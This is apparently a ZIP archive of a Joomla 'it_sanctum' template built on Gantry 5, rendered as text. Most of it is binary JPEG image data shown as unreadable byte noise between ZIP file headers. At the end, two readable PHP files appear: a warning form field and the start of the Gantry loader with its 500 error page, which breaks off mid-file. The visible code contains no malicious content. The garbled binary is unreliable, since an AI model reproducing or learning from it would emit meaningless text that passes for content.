O�����?�0���?z�3�h�r��h�z��[��U���_�K|U�~�������/���ha��~��g��^����D��_����?��?�����/�G�1?��_s� �������
������o�����Tô~=�-�W��_�*��b�ܾ�A���������������']��e�~����o�@�����ֵ�x/Z��q�{�8�n���V�O%Q���~����O�Q4�V?4⊰��r��V[jQE}�EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE�T���|����V�N��Bf����UY��*��$	52��斉�5��g�x���ٻ�v��_�����Oyn$?r(���c�������_���'���Ě�5��o�
KW��o��ޑ��2��B���߷ν�q�P�T�~��!�4]$���<��
3������|�_��x�r�4���ӷ���Km[���]�{���EW̟LQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE})����k�����������&Vҕ���`�*�dp
�+/��o�:�i�$�ޥm�h��"{[�+"�Ǻ�9N
�A�+����?��Q~�9�<�h�<�L�����'���e����
�Y~��W�:?��|�p��'���S��o�'���+������|Q�}N�W�h��0��:�)�e  ��W���掩��J./�J�QTHQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEs��*xীu/��T���M&#-��̀eQՙ��� I���W4�EF.O�*�|I���� �6��OjV�F��Bg�������;��d� I�?�_�Q=s�����Ӥ�G��'Kf�L܏�ώV��"����O�
3���f��F��-&bt�$�fh��
)��P���5W�~�O�P�:���~��>��W��S��_�!EWʟTQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE}��A|Q�x�ʹ�5�R��h�&n�tD��w��#��Oǟ��_
4�xCS�S�/ר�e��ctR�T�sʟb2'���`���mo~�_[����4뢩�i��.���d;d*Ou,��r> ����W��u�y��{���/mGJ�����/�B����;���w���/xN�sǵ5
:bޙ1��_C��+���5�]*��R��{3���Jn�Ef�AEV�aEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE����u������"�e�֐2i�t$5ާ(��_�s*����Z��R��[�JT�Vj�5v�H�>:�x�����Ş/�!����̗�$��68Q�N$~ ��_�Po~�~=�.��O���X�*I����#�����nw���<a�k|Gmkėf�mK.�����鑞�?�C��B2�vP�<~�5�8�X��h�O�~�]���vC��m[Z������(��d�`��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(����h��_,�U��Vm3S��d_��Y��:<m�A�@ ��߰?�{�?���V���1n�49e�0f�'�"�ǐ�0�Y��G�>/�<�kkD�/4�[M�Okwk)�hteaȯk(Ϋ`ge��]��x��GG�&���#�_��
��q�c4������,�?����km���x�s�v�����X�8�~֋��W�?-�`ka*{*���~h(���8Š(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��+��(�3I����e=���E�ި15���^�N?��!�ۈ)\��u-?kY�~/��
l]OeE]�͞�{��G<#�xU����<m}�;C�L0�4�?���	�Ž����D������w�j��Z���}�,��+)�#�:��I$�g�1վ x��Z�5�[Vԥ3�]�Je�w=K1�@1Y���o�V�J�H-���G'���au����]��QEx��QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE�����-�|
>��5�<�`��y��G^�7y��}G��J�2��c�aj{Z.��~L���h��*���^h��|	�����u��ZΏ�F%����I��Gpx � �F+^���������S�ߵxn��ԁ�
��Yގ����rc������o������7÷�`��a�+�yk��:K�8�n
N�+)��c$����[���?_���C�o^޻�EW�|�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEVO�|w��3���
R�F���̷7�r���}��Ou$�2My?�~��*�ɛ�W�n��e�4+7
yw�3�G���pp����d�޾<���U��^��B������1[;!�:�&:�<�mh�sl��	r/z}�z�������_;�a߿�]��?��Y�c�x����|?��
֭�7���!;�	��:��|E��7[S��w��?L�`h�)�*
��~l(���;�(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��|'��S�~$��4]B�I�t���v�43@�+)΢�m;�4��?Sa?�.]���^�����E����1(����6sʠ��kG�l�C�[�i�V��7���\[�%�ta���He#�A���b���2����D��u���Y�o��/ܵ�d��}�\�yx'��}�S�S�jX�y7U���>36�8T�\������z�4W���?�Q�?�~�:����d�u΁�:��`|�i�s�' cp\���"�h*��i�G���ԣ7N�Zk�
(��1
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(���?�_c
)���?��mOe��\�֓�(��dghb1X��S�R�I.�چ�i�t��}��i�.������6�{��qB�2Y��
�rI�W�7��ʱ��^xc�ϗ�_����i��mnz����?磍�p�#��;�
E����d���?�|*�n��4�m�U�n�8��UW&���͸�u/K���;~~��e<'
v������^��/SK�1վ x��Y�5+�_V�$2��]��M;��I>�J͢����wg٤��
(��Š(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�:>�y��R�O������Kż���9�� � �����~"�{�=�ռ�)ї&�l�jvà2�:�_���\�_�Wf0���=	[ˣ�G;/����^7���#|��������
���is`y��e�lgd�pѿ�.J���7���߳�b׼���"�2�I��s��!�H��#ڿK�c��/6�⤵�~/i��@�1���4�3��!���T޹9�
�췊hW�1����π̸SB���W˯��?Eh��x�G���]cA�4�kI�]���W<3�]I���T�WG�I4�Š(� ��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(����w���xv�W�5;
J�O2��u�W՝��i+��۲4�������?�����e�������n��J�vF�/#�����?l�/.����~i��-G��F��zf(�S��8?8����<a�Cx�M{ƞ �<A�I��\��
�r4H��{W�f\U��xa��~���U�p�"����#��?�O��}��h��u|A�ֻ�~�����H�r:f$�`S�'s� ��?u}b��������܆Y�.$2K3����IbORNj��X����=y_ˢ�G����%�ϫ�aEW�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEzG��[�B��<Bڇ��I{���5ř"[;��H[(�n���ҏ�;����_f�~(���τ�ԳW�K��Yy��]�9%�W�}�e��+�J^�g����<��%�������~g��oi~9�-�]R�����ݜ�</����Я�?�'�M��b��<�KCv`�[�e��?�-���,���W�������ߋ>�G����F�Z��R[�dOr�L�Š��ak{���y���|6a�x��~>[��~_q�?Er�	�7xG㿆�X�w���i���\	D��ލ��`�u5�ќd���e�%fQEQ!EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE�U���?��mc�"�|;�.@���b���o�T}*e(�sI��O�*��?�>-�
�\�֥a�ivk�{���!_Vv �5��P�4]�o���r2��k�Z)��v�8�s��W�o�ڷ��A����(Ե��^f.������8�!r{�_3�qV��Gߗ��_��}>_˜���r>{��>q�e�X��x|��\�?��M5u�i����oUI6a�OP�5?h�����Y�����UHܽ���*���B�E8�vԚ�j+����v�-;-���9~K���ҏ����|�QEyg�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEn|;���/��&�Y𾹪xT��]X\�c�%Hʞ�����?�=����&�c�m=p�}m��QQ�v�*LzmB{�|Ev��Nބ���lp�2�6)Z����~�~��S_�?����Ѽ]k���
+Zō���y�#{F�^�_�}{�����3$6����L8J�Ӭ��uRL��s*k�p|c�qP���������o����/�_��?�
+�����?�^
��e8V�t)>�>��:(�e�>���/�+�o��x�A�.�[/�y�{�ɶQ�ۊ��&m��
j��s>W����ƃ�}�ޏL��+�<Т�(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�������q�O�L�m����c3�׬=���)���|]��
�t:�᷃�5��*���'�m��V�w_��3�^~/6�a��4�m�܏K���?��k���z��࿴_�����ʷk�,�Ե�|��tb/��`�dm�]Y+����|b��{ox���G� �ZW�
�S�,��H?�=x]|�3�~�9��?��X.
�X����o��gߟ�����^:Ý�v
�]B�m����ATy���vj���/�|]�$�NJu�[���5Ρt�c��X�(�v�E|�31���Ϳ.�v��`��6Z����QEq�EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPN�V�EtfWRYN#���@��K�
���4p��^9�u-6c���ôtPeˢ�#-}y�W�V�m�"x�O2���9���?�[��Z+���X�>��;vz���<�VG��kR��u��?S����;�OƇ��M�E�մ�R�|�F��\׿iڕ��c՝�7V�.��đ�=C�W�+]W�_��4�5w�xOŞ"�܅�7�v�-���iU�o�W�a�ʢҽ4�ӷ��9��o\=F�����5���u����G��h�1�����Y6�I���oƾ��g��wf(�c��T��$�����"�c��y�׹��O�N/����b8W0���Iy?�?H�����a>�IH��~���Y��ԯ�M��?^���^���x��~"\g:f�
�>�[�h�(V�Խ<j�<E���3���+��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
+����	|+��O�xv,nݩj0ڂ=�����?��Õ��6����G����M�/�~��c(Q�,�}ZGM"����>���7�'������>�ڃtI����}�q	s��>���o�.�O��H��GC�u��m�t�i
��9���]��x؎(�S�d�����s
�TW��+�����
2�K������KI,���ׁ|a���|�+�G�x�Lկ��&�R��껢5?�����ώ�4��y��x��>$�v�ѿ��c?���W���)�(SKͻ�
ߙ�a�.��Q�$����G�Ư�8jĶ��$�ϗ}���{xI�����*��>t:��5
'O�#�:'�K�
z�1�G_gv��诞�gX�F�*;vZ/�>���Ӧ����t���$��I#fc�bz�}i�Q^Q�Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@>��KI�H��3�]�S�
2��������E���kc��
^w��6b��{7������D����(�躞�	$z�F��Nk��+��a���:�_6q����N/�Я��Þ<�t�����}����B�l~F�S���q�n��m�9�6����y���J����
|I�C�^_�/�<ڜ3�O�]�ѵ�����k�N����<_�稼�C����x�
�;��h��5���w����^?#_��Wt8��%��qT��\����	h���p/��_�+����Ao��k��io�:�>���7��y嬙��\��Etnj�}�k��NYp]�Q���+�|F����=<���?�V���7k�)c�z���N��q��G�&��d�%t��������E2�_MݓJ�zmr1D��O�|Ҿ������&��I�R�K���=��6��Yc�z���߈��?��^ѭ��̽�1��5T�4}(����
\����c�:տio�:~���6[z���x���W/����t0�w��޾F���f�綊�\g[��_{��k���?��?x<A�s���9�K���E��on7~)	�����]��:
��d�~����I	��������>/ƿ�E|���T�?�''�_�?W�S��:�w�'ßj�u�y���0�=�k�3������?�/'�������
+��f3����K���|3�C�]�տ������C-���#�]7G���i��>��޼gǿ���ω��\���;�d��j���#�+�h�:�a���J�6zTr�-/�ӊ�!��Iu3I#��Hw31��}I��Eq��EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEP��PK!źH5#it_sanctum/custom/images/info50.jpgnu�[������JFIF``��"ExifMM*��C		



	
��C����"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?�袊(��(��(��������ݭ�ׅ����O���\Z���`�s9HOQ���F�W�N.O�\έjt��RJ+���<~��K�_�A��!�P��'�n�,��ؘ��6�2���]��o'��ܾ6�O+c�-���v~���#ǵuI�_���<�ӷ�_}�#�+���
�h?+5����"d�ӵ�h�g!nl�‚}�矋��/�O����>(�r�����,6����F�:Q���5|�E^�9%ݧo�ꡘak;R�>ɫ�ۜ=Q\g`QEQEQEQEQE^�φu/x��G��/5M[T�KK;;HZi�v
�Ɗ33�M	6쁻+��}����<}�BY���3M���we�;�b�ƣ�혯��LT���9T���M�$F��/Xi�0��k����^V�	[��UX���+���#��gb�j�bI$��Oz����SJ�7��7�/���y�4�,��K�%����	��V��O
x6�MbԆ]sWU�5R�8�fu���"ӭ{L�=Ĭ�3H�rY�I�i�W�Q�N�y)EEvJ��V�R�����n�Ejit��!Io2Fz3FB�ƴ2!��D��[ȫ%�������C�VS��
-��9�t�3�EZ�q������2c�|9Ek�m�� ��/!��&8�˿�7�	��+�)�k�n�=s�2I���KW��'R`@kyp@�@��������]oK�����������n�Y��q��7]
� �AW��p����%�~�g�?3�2�$��Z��<{?���2�W���t�C�G�+��͢5ι�f�m02�Vʼni-�dȄ��
�x��?:��|v_[W�VZ���t~���(�){Z/N��}�QE�v�Q@Q@~��"?�����-~!x�Mo�Y~"�&.cĞ��q�?r�T?�c�7�����?chO��x��kq�?�2CsR�c�u6%��#��ƙ��2�#�Yk�a��I$��{��p�P���U���>�3���h��~��%�(�����Ž�T��м�1���=@#4�?�`���������:��t?�>��j�t���ym�8�\4v�1��7Ş7E_�|/���G���h��m�P��淺���Ͼjo���<�����gH֯,�3G;����s�5���y�a^�!Ԩ����ٲ����Ɲ$�m_7����?��Hu��I�<�`��dž�F�m��
��c�cs*('����@J��I$�j����u�����wشMP��q���t��M	�=����F�]\F	N��M��K���?7�L%,>5Š�i;.��~aEW�x#����d��$BYN
�Ѓ_�_�Yo�&ͯ��U�*�K�/�u����k �.�?,���Wk3dR��j�c�γ<k�'�G��o��1�z�i-�������E*�ʜ�\2���s\��6��-�>�����S���Ua�U��o��Q^��d�̺��F�����Iu�8�N�d��e �q��@p���]2J���9S��5f�����XԂ�t�ף
(��4
(�`��~E���o�{�e���u�n5dMgo����a�A���Iթq�M/�εUJ��Kh����	�8�� �7’Z��X��j����7*�2�:o�Dv�V�~����k�ZGb�#b{�ɦ��hƕ8҆�I/���jҫRUg��o�QEhdQE|{�#��N�_�����������Ɛ�Ov��n4P\�<r��*��UQ�]>!��s�Ʊ�!g{��k-�:�δ�ÏP����Z���Ěm�������2=�+)� ��g�%�O���������M_m4�{����,{�>!�a�{4�����s�a�W�����E��Xֵ�}kZ��E%��!#��Mϵ71˹,r�uV�֬�9mol�F�XgY
�R5f��iҦ��V��6"�J�J��{���+c��(����S�_�7�:��~��ۡ�jr"厝r���{$WGj��W�~I��m�P|#O�������o�wV��������[��$-�U���&�7��*��U�����~����S���?���(���3����xI|C�xh2+?��7�_��fO.Б�[�F5�m}��O_������_\�{��=1��5��qOI>�������/��o�C��(����B�(��ҊJ����
��P�X����^^�;����Y����^_�f�U?�6~ٗ���$~����c�/��c������c���7k�K��o�c���k���H����g�U�#�/�Q_B|�QE%��Z^C*�����A�7��?���m��^�5�-�7�j"�Xnd���_���z?o{��n��2Ń�;���9�|g�i��+���'���~�	��QE~~~�����K�(6�b�姉4�KN,X*���t��Z�TV�w�7���C�'�ʒK���]FxP���*�b��ǽN�2��&�W��o��y�[R��Qiz�C�8��e�u[�ռ�4SDےd<�����4��A��QEPzQA�@���S��Hş�g�����S��Hş�g�����a��S�O�g���?���G�w���%��7��1��d5��_���n�����,�����~���/�����x��F3�_�
(����Т�(K1��Α!�x�$s��s���4�<f��%���R+,���s����4�!����(O�D�
��H��#��ƗL����7����գ3y��8�>u�\g]9Ң�&��E�3���*�}ZK��QE��Q@���GO�r/�'�1��ۋ���_D~�#$n�:!��u�|��KZJzb�����&��7�S�JXk��4���i~#��n&��:.d��Ƞ`�W�r���N����]���յ����Z�[�%��<r��GFVV��
~�ù��aTd��h�G�_�g�I��.-�+ݞ��_'�4MEW�|�PzQA�@���S��Hş�g�����S��Hş�g�����a��S�O�g���?���G�w���%��7��1��d5��_���n�����,�����~���/�����x��F3�_�
(����Т���ڛ���d��Z玼B��o����ٙ|�կ\7�h���B���%�Fj*T�8���-[.�9T����#����"��
� �gY?���]U �wF�gU�	%���qƿ5k����?Z���+\�o�����+�o�&��2HňU訹ڪ8U���{4�<^&U��oE��3�\��xX�[�����QE瞀QEW��
�k�,~|H�"���ҕ��s H�ydb���l�ŖS����/�]ۗ����*Է�5ٜY��2��Wn��}�9KA+G"�:��0T���m~E��6ಷt�/�?�X�m��]3\@f��!�����-S���I��EX����#�v:��um;\�42Z_�\,������ʲ��X` ~���1���=z�����6e���䪴�?�>_���W�y������������
�>�A׵�n�n�Ze�Mcc��]~���W��Ói/�4�*t��I��J+�kp���IJWm��_�t��<[��N4��$�}?�����T��>,��T����]�X����X��+�2Qs�J�3���NX�9��(�k�����R��}��#���b�:�mwm��հ�����K���/��6����t�y͝�x�Pՙz�mA��T%cB��k��HӋ�ݒݳ��9Ԓ���#��ߎ�_��
�<I�MR�D�4Ksut�b��2p	f,UUweEVfU?���RO�(��u�Y�khn4��u���l�y�X��S�%|�v�UIX�Ur�#��P?�)'�?n��m4o���S���9�L�+������J����0ER�3��_�g�A���P�W���;}�/��}a�1�迗�w�^eQ_*}PQEQEQEW�~�߶O�o��R_�ėZ\7N�{�HƟ�c��@�Fm���	1��Nk��)U�9)�m5�hgV�*E¢M>�T~�~�?�p�|c
����
�7R|$������.���Pt
�hoO�~��?
�=�n���|E5�1�Z���M֮Vt�Q�N���*��|/b��Z�M}��Z~��?Q�Qn�_s��?�K�9����/P�T�Σ
�_���h�
m�þ9�#�n�sj�=��+�����:]��K��̑���A���kՏѷ�M����˂�_ݪ����Ŝ�	&��R�>ӵu$�z�����P��������\{��t˟�[��?#Gl$1����:d�����|G�d����zEm�ڍ��DPdc�a�5~3�V�I/6�+~gN���Uo�+~.���U�N��wڝ�ƛ�­�y����#H纏#���B�y^t`pck����o�j�߈�[�j�"���/�iH*�~�(�Qp��~���vi�Żו�m���}N+�a�FϾ��QEy�QEQEQEQEQEQEQEQEQEQEQEQE��PK!�e���� it_sanctum/custom/images/zou.jpgnu�[������JFIF``��C		



	
��C��D�"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?��Ĺ��ƣ�|[��?�.�1�����j�����K��j?�ſ�������o�ƫJ��Ĺ��ƣ�|[��?�.�1�����j�����K��j?�ſ�������o�ƫJ��Ĺ��ƣ�|[��?�.�1�����j�����K��j?�ſ�������o�ƫJ��Ĺ��ƣ�|[��?�.�1�����j�������������\�a�i�K('j�'p;SI����d�?�.�1�����j��K��j?�ſ��*)f�b\��cQ��-���ؗ?����5ZY��z���<�����%�T�@�=7�>�.qM&�{y��ꊿؗ?����5G�%�5����V�B3�.�1�����j��K��j?�ſ��*(7�����o�ƨ�Ĺ��ƣ�|[��Ң�3�.�1�����j��K��j?�ſ��*(7�����o�ƨ�Ĺ��ƣ�|[��Ң�
(��?�o?�)��9�1���=�l^8m3G��e�G��?�8|�̶��nY���wNQ�r
yƝ����'??�U?�/��_�_�f/���ox+�^'��vA>�a���'jHF�\������˟���'�
~�'����}�
F��l�WO�Z�#oq�K������٦S�ʞ	�c����h�oK��8�󼪝\�9��7/v<�R����_� �I�G��~1x�G�֋�o�j���v��.�����$[�O@'�_{����Q�;�%��+���X_��?�1	k2�_8�B����+�f�����5'�O�^/���Ia�ͦ��z�eAN�܌���J��K�8��~xS�?�O�-c�O}���Isy0�#.ZIe#<�@�(=�wV�2��Q*q�7�ʔy��M�~X������(��5Zu1X��)�˒I4���z>���{�
��Ś����t��ma�ۼC�e�z�i��S��3������b���'��ෂ|#�'�b�e�Os+��7wܬ��s
+�/�('�og�'�I��Ц��1�e�[f}��I_2�Y��X�A�]�9.g�y�'�t0�O�4#���{k���C�96�S���u��V��weu�^�N�����ি�n�G�|w
�	�M"�+�C�q�"���ot���ݡkvV�_�t�M�-��_A�)x��T�R��$/�_~�?��M��^�NJ|-<���I.7C*;�Ĭ�� �z��RA�j�ʌUf��I�5�Y��β����J�NtWI+����5ܞ�.!�3���d���(�JR����o{U(��]������7��
<A��I$���2��~m����,p}k�ؗ�
�������Oj+������C�YZ�g	���s�.Jltg�_�_�L��O���CZ���;�A|-�^z���I_-�9N�I��U��⤓}-��w���g��?e�u
�4��䖜ם���-��}��|���xO�%����7��_���^�o�p���
���}�t�+����^�5̺V���IIvyn;�I�U����2O�ºy?�������E?�)k��?τ�e������>�qz�.#��p����v��שV�p|i*�_�������ѩ���S��N��n���b���i�N�E�9�(>��O�ڷ�^���.��o�/�A�DK�
nK�_��p-��90M̕�	ِ9�{�|��u�'�	Ѧ^[|A�t��xr��f�����\�4=_�	�o�K݈*Uw�x�~�´���mm���>�b[E��[�}���:�n���^������eo�(K���"�.Tg¨O_SR�Ԛ�ϥ�ɤ���s㯇���Ɖ�|x�k���խ�A�R3,mϓ�#q��+�t�w�	������+����B�z��fԦkQ	�t{V�J�KU�!�=����_�)�u������4?x���c�.�o��6]V�=S�d[V�3 �a% ��8�Mc��
3�~�����
�'?
~"7�4;�쁾{:�530q$�R�NCp8��~/��?~�ϟ/n�M�_�_~!����k��Z��qi�309������/��j�����(���6�/	�6� ��H� �
|��_�(��/xG�?�+���|$��|1��bm[mZ�Y�ڡ��h�l�.wFI�ƽ��E�&��O�Q��w>,��Uq�P�D@#���ʳ���gM������?G�:�Y��V*QnZ5u�K�>N���o�I���o��>&ߝFo��g���=+ռ�_Ƿ_���{������c��_����6���N'�u���%��F����B�����������g���#��d�7	�
�����\�Fr:W�gX�\�U��N���:�;;�Mm���ܓ,?$)F7�WQ���U_n���߱��?���׀�%��>'��m�(�4`�26@$`�x�֯�gP�T��Os4�:ϺI\�6'���@+�O���kZ����^3[V�n�k+8�,tA��L�B�>{��f�����=���Q-~��o���!卨<4�)S�k��*|;T�_;77���9^+�B�7�S�Y(�(��Q�q�\��ڲ{��EW�Q�QE�_�/�_����f��{�&[�t�.�i!����Ō�W ���$nGJ�7��~��'�cia�k"/���5_j�S�f8w�M��-�F1�׌f�����7�����𿂼�_�F��U��J�湳��g�_b��#H����{����'����'�1��n������l6U*��0�V����Z]z���t�+��g1��N�
�'i7g-R�;n~�G���͚��Y�֟cyờ���Gl�l�F����~0��?e��i/
�����>�^[o1��̫�7�g�8��3K��~5D�>?]����L��>1ō��v>�,��MzYO�˨����F�j�v�F���{�)�C�f��6.�t�C�iI�kNUk4~�x���{�+��k�G�<?6�$~c�����d�Q�h�w���)��[�~п�M�G��>I�j1����1�x��D�o�,��~{�?bo��*��+_)c��I�G�J�W����_�>'��u?��<;����NI��q�IBV$=�;� (����rl�"����n[�����Dzy�q_`�GC驵�+I-{�%u}�v��_ٓ�����$����Ģ�Q�Zkx0=KE6=x����kG�-�Y�oZ��R�I>}��Np��lN��車�����vz&�o��[Coak�Cn�qī�P/L�~s~�_�JO��(��Z���^HfRȱ����@�	#����T�q��$�cg������v�w�m}���}��fYU<�1����T�Wm�\�ܫV�����[ͯ}���~�
�?c��i�'P�<Sh�zu���O$��I�
NTX��g$
�O��᫝s���.�BaѴ�뻃�1���Z���|}�-���u���5pD;�y���_���O��;L���\��	���^�Ơ�
�� �#M����$�mU�W.ȲZ�=eV�[�n���I}���(��q_a�|fХBۧ�+rI]+�'�Y/=���
�k��=C&��GA�ƭa�E�ŧOg$�pyei��œ/q������>��LJS��L��G��\�*
�=w>��}���o؃�M��MzK
mV�Y�滶��d�%���X��n�ݎA�F	���g���7��R��ZF�me4�IY8����=k��!�|�7�\�4�����Ѯ����~��m��
d�c��y����z��ҿ�����7����#�
(��x��O4sN���1D�dn�,@$��|��q��#��X����/x��K{	c���]��q��� �V_7��$�9�A�<y�.��8����.��Z�ľ!֭��u9�D����^MR�iv�,2T򼎵����y�Y�^Gw�j�[�����/�dU��	x%P�vB+����7�����N�?�|�R}5'��u��mN�I�����a��Hx�_�o���Zǎ��/�umF�Z��-:�X�k7��gX�G�2�l��>Y��W�n1�|!�O�Llq��x��hڵߋ��{�j�v�r`�c4��&HD1��`dߵpNF��A�q����W��(��9[�T����<����/�"GÞ�Y�}|W��I_n~��
�1��7����K�u�坉h�V�q��l��Fv��c�z���_�4o����)+�s�����EY�<��I/�N��-���V��3!�$��H!� #��ᾱ�p�ʤکd����s�?��j9U:��/b�C���\�ү5�{���Z�Y�?�Z�"��橬������_M�B�����H��S��{���e���-�b��T�5
�>�'~�Ɵ�O����W^2��Yx>��0_���mIm���,�"�`�����J�W�7�F4����J$��L�+��M֧��*KO;�k�d��W�ND��w}l�m��O�ZTQEz��Q@Q@Q@Q@Q@Q@Q@Q@W�4�]nɭ�m������1"6FA��V(������.���w�PY�^1�s��4��D�7>^��'�T���HǞ ���$s�kV�ăᯇ-QV=D�V3����0�>^�f�h��G�?�>���ZY��F��b���ќ�{Y��,��� »*+*�)փ�Z*Q{���ɛa�5��jq�٦�^�j|!�W�	.�u
瀵�sog�ɧ�4��IeHN2��'����'�Ï|���/�h�pkVS�<���dI������_C�_%��L���5���j�'�k�G{k&��>�6�:�2��Ƣ��v����}d�{�3'�"�Ur��~L]��	Q�����;��+8�e��t�h��> (��(��(��(��(��(��(��(��(��(��(��(��(��(��(����PK!K^)�ccit_sanctum/fields/warning.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

class JFormFieldWarning extends JFormField
{
    protected $type = 'Warning';

    protected function getInput()
    {
        $app = JFactory::getApplication();
		if ($app->isAdmin()) {
			$app->enqueueMessage(JText::_('GANTRY5_THEME_INSTALL_GANTRY'), 'error');
		} else {
			$app->enqueueMessage(JText::_('GANTRY5_THEME_FRONTEND_SETTINGS_DISABLED'), 'warning');
		}
    }
}
PK!ȍ�o<<it_sanctum/includes/gantry.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

use Gantry\Framework\Gantry;

try
{
    $app = JFactory::getApplication('site');
    $template = $app->getTemplate(true);

    if (!class_exists('Gantry5\Loader')) {
        throw new RuntimeException(JText::_('GANTRY5_THEME_INSTALL_GANTRY'));
    }

    // Setup Gantry 5 Framework or throw exception.
    Gantry5\Loader::setup();

    // Get Gantry instance and return it.
    $gantry = Gantry::instance();

    // Initialize the template if not done already.
    if (!isset($gantry['theme.name']))
    {
        $gantry['theme.path'] = dirname(__DIR__);
        $gantry['theme.name'] = $template->template;
    }

    // Only a single template can be loaded at any time.
    if (!isset($gantry['theme']) && file_exists(__DIR__ . '/theme.php'))
    {
        include_once __DIR__ . '/theme.php';
    }

    return $gantry;
}
catch (Exception $e)
{
    // Oops, something went wrong!
    header("HTTP/1.0 500 Internal Server Error");

    $message = JText::sprintf("GANTRY5_THEME_LOADING_FAILED", $template->template, $e->getMessage());

    echo <<<html
<html>
    <head>
        <title>500 Internal Server Error</title>
        <style>
        .alert {
            padding: 8px 35px 8px 14px;
            margin-bottom: 18px;
            text-shadow: 0px 1px 0px rgba(255, 255, 255, 0.5);
            background-color: #F2DEDE;
            border-color: #EED3D7;
            color: #B94A48;
            border-radius: 4px;
            font-size: 1.2em;
        }
        </style>
    </head>
